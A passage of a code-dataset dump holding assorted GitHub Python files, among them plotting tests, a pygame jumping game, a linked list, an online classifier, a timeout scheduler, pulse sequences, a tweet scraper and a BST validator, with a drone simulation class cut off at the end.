\"axis,expected_axis_lines\",\n [\n (\n Axis(display_length=51, label=\"my_fun_label\", limits=(0, 1)),\n [\n \"└┬---------┬---------┬---------┬---------┬---------┬\\n\",\n \" 0.0 0.2 0.4 0.6 0.8 1.0\\n\",\n \" my_fun_label\",\n ],\n ),\n (\n Axis(display_length=51, label=\"my_fun_label\", limits=(0, 0.01)),\n [\n \"└┬---------┬---------┬---------┬---------┬---------┬\\n\",\n \" 0.0 0.002 0.004 0.006 0.008 0.01\\n\",\n \" my_fun_label\",\n ],\n ),\n ],\n)\ndef test_draw_x_axis(axis, expected_axis_lines):\n x_lines = _draw_x_axis(x_axis=axis, left_pad=0)\n assert x_lines == expected_axis_lines\n\n\n@pytest.mark.parametrize(\n \"axis,label,limits, expected_axis_lines\",\n [\n (\n Axis(display_length=16),\n \"my_fun_label\",\n (0, 1),\n [\n \" my_fun_label\",\n \" 0.99┤\",\n \" |\",\n \" |\",\n \" |\",\n \" |\",\n \" 0.66┤\",\n \" |\",\n \" |\",\n \" |\",\n \" |\",\n \" 0.33┤\",\n \" |\",\n \" |\",\n \" |\",\n \" |\",\n \" 0.0┤\",\n ],\n ),\n ],\n)\ndef test_draw_y_axis(axis, label, limits, expected_axis_lines):\n axis.label = label\n axis.limits = limits\n\n y_lines = _draw_y_axis(y_axis=axis, left_pad=10)\n assert y_lines == expected_axis_lines\n\n\n@pytest.mark.parametrize(\n \"canvas,expected_canvas_lines\",\n [\n (\n np.array(\n [\n [0, 0, 0, 0, 5],\n [0, 0, 
0, 4, 0],\n                    [0, 0, 3, 0, 0],\n                    [0, 2, 0, 0, 0],\n                    [1, 0, 0, 0, 0],\n                ]\n            ),\n            [\"@ \", \" x \", \" o \", \" * \", \" +\"],\n        ),\n    ],\n)\ndef test_draw_canvas(canvas, expected_canvas_lines):\n    canvas_lines = _draw_canvas(canvas)\n    assert canvas_lines == expected_canvas_lines\n","repo_name":"CDonnerer/shellplot","sub_path":"tests/test_drawing.py","file_name":"test_drawing.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"33700199341","text":"import os\r\nx = 100\r\ny = 100\r\n# create the game window at position x and y on the display\r\nos.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (x,y)\r\n\r\nimport pygame\r\nimport pgzrun\r\nimport time\r\nimport random\r\n\r\nWIDTH = 800\r\nHEIGHT = 600\r\n# color of the steps\r\n# the character\r\nfox = Actor('jumper-1', (400, 550))\r\nfox_x_velocity = 0\r\nfox_y_velocity = 0\r\ngravity = 1\r\njumping = False\r\njumped = False\r\ntimer = []\r\nposledny_schod_y = 550 # y-coordinate of the last generated step\r\noptimalna_vyska_fox = 200 # coordinate where the fox will always stay\r\nvyska = 0\r\nprvy_pohyb = False\r\n\r\n# (left, top, width, height)\r\n\r\n\r\n# rendering on the display\r\ndef draw():\r\n    screen.blit('oblaky', (0, 0)) # background\r\n    # draw the steps, including the main step, with their color\r\n    for schod in schody:\r\n    \tscreen.blit('schodík', (schod.x, schod.y))\r\n    fox.draw()\r\n    screen.draw.text(\"Height:\", center=(50, 540), fontsize=40, shadow=(1, 1), color=(255, 255, 255))\r\n    screen.draw.text(str(vyska)+\" m\", center=(45, 570), fontsize=40, shadow=(1, 1), color=(255, 255, 255))\r\n    if fox.y > HEIGHT:\r\n    \tscreen.draw.text(\"Game over\", center=(400, 300), fontsize=40, shadow=(1, 1), color=(255, 255, 255))\r\n    \tscreen.draw.rect(Rect((330, 330), (140,40)), (0,0,0))\r\n    \tscreen.draw.text(\"Play again\", center=(400, 350), fontsize=30, shadow=(1, 1), color=(255, 255, 255))\r\n\r\n# when the button is clicked with the mouse, the game restarts\r\ndef on_mouse_down(pos, button):\r\n\tglobal schody, vyska, jumping, jumped, posledny_schod_y, prvy_pohyb\r\n\tif fox.y > HEIGHT and pos[0] > 330 and pos[0] < 470 and pos[1] > 330 and pos[1] < 370:\r\n\t\tjumping = False\r\n\t\tjumped = False\r\n\t\tschody = []\r\n\t\tposledny_schod_y = 550\r\n\t\tschody = generate_first_schody()\r\n\t\tfox.x = 400\r\n\t\tfox.y = 550\r\n\t\tvyska = 0\r\n\t\tprvy_pohyb = False\r\n\r\n# game mechanics:\r\ndef update():\r\n\tglobal optimalna_vyska_fox, vyska, prvy_pohyb\r\n\tfox_move()\r\n\t# move the steps while jumping + stop counting height once the game is over\r\n\tif fox.y < optimalna_vyska_fox:\r\n\t\trozdiel_vysky = optimalna_vyska_fox - fox.y\r\n\t\tfox.y = optimalna_vyska_fox\r\n\t\tfor schod in schody:\r\n\t\t\tschod.y = schod.y + rozdiel_vysky\r\n\t\t\tif schod.y > HEIGHT and fox.y < HEIGHT:\r\n\t\t\t\tschod.x = random.randrange(15, WIDTH - 315)\r\n\t\t\t\tschod.y = 0\r\n\t\t\t\tvyska += 1\r\n\t\t\t\r\n\r\n\telse:\r\n\t\trozdiel_vysky = fox.y\r\n\t# move the steps when not jumping (automatically, on their own)\r\n\tif prvy_pohyb:\r\n\t\tfor schod in schody:\r\n\t\t\tif vyska < 25:\r\n\t\t\t\tschod.y = schod.y + 1\r\n\t\t\t# speed the steps up with height, once the fox is higher\r\n\t\t\telif vyska < 50:\r\n\t\t\t\tschod.y = schod.y + 2\r\n\t\t\telse:\r\n\t\t\t\tschod.y = schod.y + 3\r\n\t\t\tif schod.y > HEIGHT and fox.y < HEIGHT:\r\n\t\t\t\tschod.x = random.randrange(15, WIDTH - 315)\r\n\t\t\t\tschod.y = 0\r\n\t\t\t\tvyska += 1 \r\n\r\ndef fox_move():\r\n\tglobal fox_x_velocity, fox_y_velocity, gravity, jumping, jumped, timer, optimalna_vyska_fox, vyska, prvy_pohyb\t\r\n\t# standing image\r\n\r\n\tif fox_x_velocity == 0 and not jumped:\r\n\t\tfox.image = 'jumper-1'\r\n\r\n\t# gravity\r\n\tif collidecheck():\r\n\t\tgravity = 1\r\n\t\tfox.y -= 1\r\n\t\ttimer = []\r\n\tif not collidecheck():\r\n\t\tfox.y += gravity\r\n\t\tif gravity <= 20:\r\n\t\t\tgravity += 0.5\r\n\t\ttimer.append(pygame.time.get_ticks()) # so that jumping is not continuous\r\n\t\t# falling image\r\n\t\tif len(timer) > 5 and not jumped:\r\n\t\t\tfox.image = 'jumper-1'\r\n\t\t\tif len(timer) > 5:\r\n\t\t\t\tfox.image = 'jumper-fall'\r\n\r\n\t# moving the character left and right\r\n\t# images for right and left, and for jumping right and left\r\n\t# adding 'and allowx' here would disable movement while falling \r\n\tif (keyboard.left):\r\n\t\tif (fox.x > 40) and (fox_x_velocity > -8):\r\n\t\t\tfox_x_velocity -= 2\r\n\t\t\tfox.image = 'jumper-left'\r\n\t\t\tif (keyboard.left) and jumped:\r\n\t\t\t\tfox.image = 'jumper-jleft'\r\n\tif (keyboard.right):\r\n\t\tif (fox.x < 760) and (fox_x_velocity < 8):\r\n\t\t\tfox_x_velocity += 2\t\r\n\t\t\tfox.image = 'jumper-right'\r\n\t\t\tif (keyboard.right) and jumped:\r\n\t\t\t\tfox.image = 'jumper-jright'\r\n\r\n\tfox.x += fox_x_velocity\r\n\r\n\t# speed\r\n\tif fox_x_velocity > 0:\r\n\t\tfox_x_velocity -= 1\r\n\tif fox_x_velocity < 0:\r\n\t\tfox_x_velocity += 1\r\n\r\n\tif fox.x < 50 or fox.x > 750:\r\n\t\tfox_x_velocity = 0\r\n\r\n\t# jumping\r\n\tif (keyboard.up) and collidecheck() and not jumped:\r\n\t\tjumping = True\r\n\t\tjumped = True\r\n\t\tprvy_pohyb = True\r\n\t\tclock.schedule_unique(jumpedrecently, 0.5)\r\n\t\tfox.image = 'jumper-1'\r\n\t\tfox_y_velocity = 95 # optimal number because of gravity\r\n\tif jumping and fox_y_velocity > 25:\r\n\t\tfox_y_velocity = fox_y_velocity - ((100 - fox_y_velocity)/2)\r\n\t\tfox.y -= fox_y_velocity/3 # jump height\r\n\telse:\r\n\t\tfox_y_velocity = 0\r\n\t\tjumping = False\r\n\r\n\r\n\r\n\r\ndef collidecheck():\r\n\tcollide = False\r\n\tfor i in schody:\r\n\t\tif fox.colliderect(i):\r\n\t\t\tcollide = True\r\n\treturn collide\r\n\r\ndef jumpedrecently():\r\n\tglobal jumped\r\n\tjumped = False\r\n\r\n# create the first steps at random positions\r\ndef generate_first_schody():\r\n\tglobal posledny_schod_y\r\n\tvytvorene_schodiky = []\r\n\r\n\thl_schod = Rect((250, posledny_schod_y), (300, 2))\r\n\tvytvorene_schodiky.append(hl_schod)\r\n\r\n\twhile not (posledny_schod_y < 100):\r\n\t\tschodik_x = random.randrange(15, WIDTH - 315)\r\n\t\tschodik_y = random.randrange(posledny_schod_y - 130, posledny_schod_y - 100)\r\n\t\tjeden_schodik = Rect((schodik_x, schodik_y), (300, 2))\r\n\t\tposledny_schod_y = schodik_y\r\n\t\tvytvorene_schodiky.append(jeden_schodik)\r\n\r\n\treturn vytvorene_schodiky\r\n\r\n\r\nschody = generate_first_schody()\r\n\r\npgzrun.go()\r\n","repo_name":"Weirdo5858/Fox-Jump-Game","sub_path":"Liska_skoc(Fox_Jump).py","file_name":"Liska_skoc(Fox_Jump).py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"sk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"31838286344","text":"class LinkedNode():\n    '''\n    A node within a linked list\n    \n    Attributes\n    ----------\n    value : Any\n        The value of the current node\n    \n    next : LinkedNode | None\n        The next node in the list, or None if current node is the tail\n    '''\n    \n    def __init__(self, value):\n        self.value = value\n        self.next = None\n\n\nclass LinkedList():\n    '''\n    A 
list of linked nodes.\n    \n    Attributes\n    ----------\n    head : LinkedNode | None\n        First node in list. None if list empty\n    \n    tail : LinkedNode | None\n        Last node in the list. None if list is empty\n    \n    \n    Methods\n    --------\n    append(self, new_node)\n    \n    prepend(self, new_node)\n    \n    insert_after(self, target_node, new_node)\n    \n    remove_after(self, target_node)\n    \n    __str__(self)\n    '''\n    \n    def __init__(self):\n        self.head = None #First node\n        self.tail = None #Last node\n    \n    def append(self, new_node: LinkedNode):\n        '''\n        Append a new value after the tail\n        '''\n        if self.head == None:\n            self.head = new_node\n            self.tail = self.head\n        \n        else:\n            self.tail.next = new_node\n            self.tail = new_node\n    \n    def prepend(self, new_node: LinkedNode):\n        '''\n        Prepend a new value in the first position (head)\n        '''\n        \n        # List empty\n        if self.head == None:\n            self.head = new_node\n            self.tail = self.head\n        \n        # List not empty\n        else:\n            new_node.next = self.head\n            self.head = new_node\n    \n    def insert_after(self, target_node: LinkedNode, new_node: LinkedNode):\n        '''\n        Insert a node after the target node. Prepends if the target is\n        None, appends if the target is the tail.\n        '''\n        \n        if target_node == None:\n            self.prepend(new_node)\n        \n        elif target_node is self.tail:\n            self.append(new_node)\n        \n        else:\n            new_node.next = target_node.next\n            target_node.next = new_node\n    \n    def remove_after(self, target_node: LinkedNode):\n        '''\n        Remove and return the node after the target node\n        '''\n        if self.head == None:\n            return\n        \n        if target_node == None:\n            removed_node = self.head\n            self.head = self.head.next\n        \n        elif target_node is self.tail:\n            return None\n        \n        elif target_node.next is self.tail:\n            removed_node = target_node.next\n            target_node.next = target_node.next.next\n            self.tail = target_node  # the target becomes the new tail\n        \n        else:\n            removed_node = target_node.next\n            target_node.next = target_node.next.next\n        \n        removed_node.next = None\n        return removed_node\n    \n    def __str__(self):\n        '''\n        Print the linked list in traditional python list format\n        '''\n        if self.head == None:\n            return str([])\n        \n        current_node = self.head\n        node_values = [current_node.value]\n        \n        while current_node.next != None:\n            current_node = current_node.next\n            node_values.append(current_node.value)\n        \n        return str(node_values)\n\n\nif __name__ == '__main__':\n    \n    nodeA = LinkedNode(1)\n    nodeB = LinkedNode(2)\n    nodeC = LinkedNode(3)\n    \n    myList = LinkedList()\n    myList.append(nodeA)\n    myList.append(nodeB)\n    myList.insert_after(None, nodeC)\n    print(myList.remove_after(nodeC))\n    \n    \n    print(myList)\n    print(myList.head.value)\n    print(myList.tail.value)\n    ","repo_name":"Tanner-Gladson/dataStructures","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"366001713","text":"import numpy as np\nimport math\n\nfrom numpy import linalg as LA\n\nfrom . __base import OnlineLearningModel\n\n\nclass ALMA(OnlineLearningModel):\n    \"\"\"A New Approximate Maximal Margin Classification Algorithm.\n    \n    Gentile, C.\n    A New Approximate Maximal Margin Classification Algorithm \n    Journal of Machine Learning Research, 101, 2, 213-242\n\n    Attributes:\n        p (int, optional): ALMA's order with p strictly greater than 0.\n            Defaults to 2.\n        C (:obj:`float`, optional): Parameter of ALMA with C strictly greater\n            than 0. Defaults to 1.\n        alpha (:obj:`float`, optional): The sensitivity of the model. `alpha` \n            takes values between 0 (non-inclusive) and 1 (inclusive). 
Defaults to 1.\n num_iterations (:obj:`int`, optional): Number of iterations \n to run the training for. Defaults to 1.\n random_state (:obj:`int`, optional): The random seed to use \n with the pseudo-random generator. Defaults to `None`.\n positive_label (:obj:`int`, optional): The number in the output\n field that represents the positive label. The value passed\n should be different than -1. Defaults to 1.\n class_weight (:obj:`dict`, optional): Represents the relative \n weight of the labels in the data. Useful for imbalanced \n classification tasks.\n\n Raises:\n AssertionError: if `positive_label` is equal to -1.\n\n \"\"\"\n \n def __init__(\n self, \n alpha=1.0, \n p=2, \n C=1, \n num_iterations=1, \n random_state=None,\n class_weight=None, \n positive_label=1\n ):\n super().__init__(\n num_iterations=num_iterations, \n random_state=random_state,\n positive_label=positive_label, \n class_weight=class_weight\n )\n\n self._p = p\n self._C = C\n self._alpha = alpha\n\n self._B = 1\n self._k = 0\n\n def _update(self, x: np.ndarray, y: int):\n \"\"\"Updates the weight vector in case a mistake occured.\n \n When presented with a data point, this method evaluates\n the error and based on the result, updates or not the \n weights vector.\n\n Args:\n x (:obj:`np.ndarray` or `list`): An array representing\n one single data point. Array needs to be 2D.\n y (`int`): Output value for the data point. Takes value\n between 1 and -1.\n\n Returns:\n None\n\n Raises:\n IndexError: if the value x is not 2D.\n \"\"\"\n gamma_k = self._B * math.sqrt(self._p - 1) / math.sqrt(self._k)\n if y * self.weights.dot(x) <= (1 - self._alpha) * gamma_k:\n eta_k = ((self._C / (math.sqrt(self._p - 1) * math.sqrt(self._k)))\n * self.class_weight_[y])\n self.weights = self.weights + eta_k * y * x\n norm_w = LA.norm(self.weights, ord=self._p)\n self.weights = self.weights / (max(1, norm_w))\n self._k += 1\n\n def _setup(self, X):\n \"\"\"Initializes the values for the model' parameters.\n\n Based on the data in argument, this method initializes \n the parameters `k` and `B` of the ALMA algorithm.\n\n Args:\n X (:obj:`numpy.ndarray`): Input data with n rows and\n m columns\n\n Returns:\n None\n \"\"\"\n self._k = 1\n self._B = 1/self._alpha\n\n def get_params(self, deep=True):\n \"\"\"Get parameters for this estimator.\n\n This function is for use with hyper-parameter tuning utilities\n such as `GridSearchCV`_.\n\n Args:\n deep(:obj:`bool`, optional): If True, will return the parameters\n for this estimator and contained sub-objects that are \n estimators. Defaults to True.\n\n .. 
_GridSearchCV:\n https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html\n\n \"\"\"\n params = super().get_params()\n params['p'] = self._p\n params['C'] = self._C\n params['alpha'] = self._alpha\n\n return params\n","repo_name":"boladjivinny/olpy","sub_path":"olpy/classifiers/alma.py","file_name":"alma.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"17330048415","text":"import asyncio\nimport sched\nimport signal\nimport sys\nfrom sched import Event\nfrom time import monotonic, sleep\nfrom types import FrameType\nfrom typing import Any, Callable, Union\n\nfrom ._types import DelayValue, SignalHandler, TimeoutValue\n\ntry:\n ITIMER_REAL = signal.ITIMER_REAL\nexcept AttributeError:\n ITIMER_REAL = 0\n\n__all__ = (\"AbstractScheduler\", \"Scheduler\", \"AsyncScheduler\",\n \"Event\", \"AsyncEvent\",)\n\n\nclass AbstractScheduler:\n def get_remaining(self, event: Event) -> TimeoutValue:\n raise NotImplementedError() # pragma: no cover\n\n def new(self, seconds: TimeoutValue, handler: Callable[[], None]) -> Event:\n raise NotImplementedError() # pragma: no cover\n\n def cancel(self, event: Union[Event, None]) -> None:\n raise NotImplementedError() # pragma: no cover\n\n\nclass Scheduler(AbstractScheduler):\n def __init__(self,\n timefunc: Callable[[], TimeoutValue] = monotonic,\n delayfunc: Callable[[DelayValue], Any] = sleep,\n itimer: int = ITIMER_REAL) -> None:\n self._timefunc = timefunc\n self._delayfunc = delayfunc\n self._itimer = itimer\n self._scheduler = sched.scheduler(timefunc, delayfunc)\n self._orig_handler = None # type: Union[SignalHandler, None]\n\n def get_remaining(self, event: Event) -> TimeoutValue:\n return max(0, event.time - self._timefunc())\n\n def _next_event(self) -> TimeoutValue:\n return self.get_remaining(self._scheduler.queue[0]) if self._scheduler.queue else 0\n\n def new(self, seconds: TimeoutValue, handler: Callable[[], None]) -> Event:\n orig_handler = signal.getsignal(signal.SIGALRM)\n if not isinstance(orig_handler, type(self)):\n self._orig_handler = orig_handler\n\n priority = -len(self._scheduler.queue)\n event = self._scheduler.enter(seconds, priority, handler)\n\n signal.signal(signal.SIGALRM, self) # type: ignore\n signal.setitimer(self._itimer, self._next_event())\n\n return event\n\n def cancel(self, event: Union[Event, None]) -> None:\n try:\n self._scheduler.cancel(event) # type: ignore\n except ValueError:\n pass\n\n if self._scheduler.empty():\n signal.alarm(0)\n if self._orig_handler:\n signal.signal(signal.SIGALRM, self._orig_handler)\n self._orig_handler = None\n else:\n signal.setitimer(self._itimer, self._next_event())\n\n def __call__(self, signum: int, frame: FrameType) -> None:\n self._scheduler.run(blocking=False)\n\n\nclass AsyncEvent(Event):\n pass\n\n\nclass AsyncScheduler(AbstractScheduler):\n @property\n def _loop(self) -> asyncio.AbstractEventLoop:\n return asyncio.get_event_loop()\n\n def get_remaining(self, event: Event) -> TimeoutValue:\n return max(0, event.time - self._loop.time())\n\n def new(self, seconds: TimeoutValue, handler: Callable[[], None]) -> AsyncEvent:\n when = self._loop.time() + seconds\n action = self._loop.call_at(when, handler)\n args = {\n \"time\": when,\n \"priority\": 0,\n \"action\": action.cancel,\n \"argument\": (),\n \"kwargs\": {},\n }\n if sys.version_info >= (3, 10): # pragma: no cover\n args[\"sequence\"] = 0\n return AsyncEvent(**args) # type: 
ignore\n\n def cancel(self, event: Union[Event, None]) -> None:\n if event is not None:\n event.action()\n","repo_name":"tsv1/rtry","sub_path":"rtry/_scheduler.py","file_name":"_scheduler.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33898126773","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar\n\nimport attr\n\nif TYPE_CHECKING:\n from ..models.invalid_item_reason import InvalidItemReason\n\n\nT = TypeVar(\"T\", bound=\"InvalidReturnItem\")\n\n\n@attr.s(auto_attribs=True)\nclass InvalidReturnItem:\n r\"\"\"An item that is invalid for return.\n\n Attributes:\n seller_return_item_id (str): An identifier assigned by the seller to the return item.\n seller_fulfillment_order_item_id (str): The identifier assigned to the item by the seller when the fulfillment\n order was created.\n invalid_item_reason (InvalidItemReason): The reason that the item is invalid for return.\n \"\"\"\n\n seller_return_item_id: str\n seller_fulfillment_order_item_id: str\n invalid_item_reason: \"InvalidItemReason\"\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n seller_return_item_id = self.seller_return_item_id\n seller_fulfillment_order_item_id = self.seller_fulfillment_order_item_id\n invalid_item_reason = self.invalid_item_reason.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"sellerReturnItemId\": seller_return_item_id,\n \"sellerFulfillmentOrderItemId\": seller_fulfillment_order_item_id,\n \"invalidItemReason\": invalid_item_reason,\n }\n )\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.invalid_item_reason import InvalidItemReason\n\n d = src_dict.copy()\n seller_return_item_id = d.pop(\"sellerReturnItemId\")\n\n seller_fulfillment_order_item_id = d.pop(\"sellerFulfillmentOrderItemId\")\n\n invalid_item_reason = InvalidItemReason.from_dict(d.pop(\"invalidItemReason\"))\n\n result = cls(\n seller_return_item_id=seller_return_item_id,\n seller_fulfillment_order_item_id=seller_fulfillment_order_item_id,\n invalid_item_reason=invalid_item_reason,\n )\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/fulfillment_outbound_2020_07_01/models/invalid_return_item.py","file_name":"invalid_return_item.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7079216994","text":"import numpy as np\nfrom common.lib.servers.Pulser2.pulse_sequences.pulse_sequence import pulse_sequence\n\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_X import clifford_X\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_minus_X import clifford_minus_X\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_Y import 
clifford_Y\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_minus_Y import clifford_minus_Y\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.clifford_Z import clifford_Z\n\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_X import pauli_X\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_minus_X import pauli_minus_X\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_Y import pauli_Y\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_minus_Y import pauli_minus_Y\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.pauli_Id import pauli_Id\nfrom Qsim.scripts.pulse_sequences.sub_sequences.single_qubit_gates.single_sequence_rb_testing import single_sequence_rb_testing\n\n\nclass randomized_benchmarking_pulse(pulse_sequence):\n\n    required_parameters = [\n        ('RandomizedBenchmarking', 'file_selection'),\n        ('MicrowaveInterrogation', 'power'),\n        ('MicrowaveInterrogation', 'ttl_switch_delay'),\n        ('Line_Selection', 'qubit'),\n        ('Transitions', 'qubit_0'),\n        ('ddsDefaults', 'qubit_dds_freq'),\n        ('Pi_times', 'qubit_0'),\n    ]\n\n    required_subsequences = [\n        clifford_X,\n        clifford_minus_X,\n        clifford_Y,\n        clifford_minus_Y,\n        clifford_Z,\n        pauli_X,\n        pauli_minus_X,\n        pauli_Y,\n        pauli_minus_Y,\n        pauli_Id,\n        single_sequence_rb_testing\n    ]\n\n    def sequence(self):\n        p = self.parameters\n\n        pulse_dict = {'[0.0, 0.5, 1.0]': clifford_X,\n                      '[180.0, 0.5, 1.0]': clifford_minus_X,\n                      '[90.0, 0.5, 1.0]': clifford_Y,\n                      '[270.0, 0.5, 1.0]': clifford_minus_Y,\n                      '[0.0, 1.0, 1.0]': pauli_X,\n                      '[180.0, 1.0, 1.0]': pauli_minus_X,\n                      '[90.0, 1.0, 1.0]': pauli_Y,\n                      '[270.0, 1.0, 1.0]': pauli_minus_Y,\n                      '[0.0, 1.0, 0.0]': pauli_Id,\n                      '[0.0, 0.5, 0.0]': clifford_Z}\n\n        # gets the file with the pulse sequence\n        rb_pulses = np.loadtxt(p.RandomizedBenchmarking.file_selection, delimiter=',')\n        # num_reps = 10\n        # for i in range(num_reps):\n        #     self.addSequence(single_sequence_rb_testing)\n        for pulse in rb_pulses:\n            self.addSequence(pulse_dict[str(list(pulse))])\n","repo_name":"johnpalsberg/John-Palsberg","sub_path":"QsimMaster/scripts/pulse_sequences/sub_sequences/RandomizedBenchmarking.py","file_name":"RandomizedBenchmarking.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"26405911865","text":"# program to calculate the surface area and volume of a cuboid\r\n\r\n# Session 1\r\n# Programmer: Mohammad rizky imansyah\r\n# Date: 11 November 2023\r\n\r\npanjang = 10;\r\nlebar = 25;\r\ntinggi = 12;\r\n\r\nluasBalok = (2*panjang*lebar) + (2*panjang*tinggi) + (2*lebar*tinggi);\r\nvolumeBalok = panjang * lebar * tinggi;\r\n\r\nprint('cuboid surface area:', luasBalok)\r\nprint('cuboid volume:', volumeBalok)","repo_name":"WalterWhite891/Mohammad-Rizky-Imansyah","sub_path":"Pertemuan 1/Balok.py","file_name":"Balok.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25104379582","text":"from datetime import timedelta, date\nimport twint\nimport pandas as pd\n\nresponse = input(\"Please enter Keyword: \")\n\nprint(\"Fetch twitter data for \"+ response + \" company keyword....\")\n\nkeyword = response\n\nstart = date(2019, 7, 15)\nend = date(2020, 7, 10)\ndelta = end-start\ndateList = []\n\nfor i in range(delta.days):\n    if (i % 7 == 0) or (i % 7 == 1) or (i % 7 == 2) or (i % 7 == 3) or (i % 7 == 4):\n        new_day = start 
+ timedelta(i)\n print(new_day)\n dateList.append(new_day)\nprint(len(dateList))\nc = twint.Config()\nc.Store_object = True\nc.Pandas = True\nc.Search = keyword\nc.Limit = 50\nc.Lang = 'en'\n\n\ndf = pd.DataFrame()\nfor i in range(len(dateList)-1):\n dayTweets = []\n if (i+1) % 5 == 0:\n c.Since = str(dateList[i])\n c.Until = str(dateList[i]+timedelta(1))\n else:\n c.Since = str(dateList[i])\n c.Until = str(dateList[i+1])\n twint.run.Search(c)\n Tweets_df = twint.storage.panda.Tweets_df\n df = pd.concat([df, Tweets_df])\n\ndrop_columns = df.drop(columns = [\"id\", \"conversation_id\", \"created_at\", \"timezone\", \"place\", \"hashtags\", \"cashtags\", \"user_id\", \"user_id_str\", \"username\", \"name\", \"day\", \"hour\", \"link\", \"retweet\",\"nlikes\",\"nreplies\",\"nretweets\",\"quote_url\",\"search\",\"near\",\"geo\",\"source\",\"user_rt_id\",\"user_rt\",\"retweet_id\",\"reply_to\",\"retweet_date\", \"translate\",\"trans_src\", \"trans_dest\"])\n\ndrop_columns['date'] = pd.to_datetime(drop_columns[\"date\"], format='%Y-%m-%d %H:%M:%S').dt.strftime('%Y-%m-%d')\ntweets_df = drop_columns.groupby(\"date\").agg(lambda x: x.tolist())\ntweets_df.to_csv('tweets.csv', index=False)\n","repo_name":"MehtaPlusTutoring-MLBootcamp20/Stock-Market-Prices","sub_path":"get_twitter_tweets.py","file_name":"get_twitter_tweets.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15196759965","text":"import sys\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def is_valid_bst(self, root):\n return self.is_valid_helper(root, -sys.maxsize - 1, sys.maxsize)\n\n def is_valid_helper(self, root: TreeNode, min_val: int, max_val: int) -> bool:\n if root is None:\n return True\n if root.val >= max_val or root.val <= min_val:\n return False\n return self.is_valid_helper(root.left, min_val, root.val) and self.is_valid_helper(root.right, root.val, max_val)\n\n\nif __name__ == '__main__':\n five = TreeNode(5)\n one = TreeNode(1)\n four = TreeNode(4)\n three = TreeNode(3)\n six = TreeNode(6)\n\n five.left = one\n five.right = four\n four.left = three\n four.right = six\n\n s = Solution()\n print(s.is_valid_bst(five))\n # Output: False\n\n # two = TreeNode(2)\n # two.left = one\n # two.right = three\n # print(s.is_valid_bst(two))\n # Output True\n\n\n # Example 1:\n\n # 2\n # / \\\n # 1 3\n\n # Input: [2,1,3]\n # Output: true\n # Example 2:\n\n # 5\n # / \\\n # 1 4\n # / \\\n # 3 6\n\n # Input: [5,1,4,null,null,3,6]\n # Output: false\n # Explanation: The root node's value is 5 but its right child's value is 4.\n ","repo_name":"nicasioca/leetcode","sub_path":"0098_validate_binary_search_tree.py","file_name":"0098_validate_binary_search_tree.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29446394831","text":"from abc import ABC, abstractmethod\n\nimport torch\nfrom torch import nn\n\nimport math\nimport numpy as np\n\nfrom gym.spaces import Box\n\nfrom system.base import System\n\n\nclass BaseDrone(System, ABC):\n\n def __init__(self, horizon, discrete_time, euler_time, initial_radius=0., initial=(0., 0., 0.),\n feasible_set=None, device=\"cpu\"):\n super(BaseDrone, self).__init__(horizon=horizon, device=device, feasible_set=feasible_set)\n # spaces\n self._observation_space = Box(low=-float(\"inf\"), high=float(\"inf\"), shape=(12,))\n 
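# the 12-D observation is (phi, theta, psi, p, q, r, u, v, w, x, y, z); the 4-D action is the four rotor angular speeds (see dynamics() and _get_motor_forces())\n        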
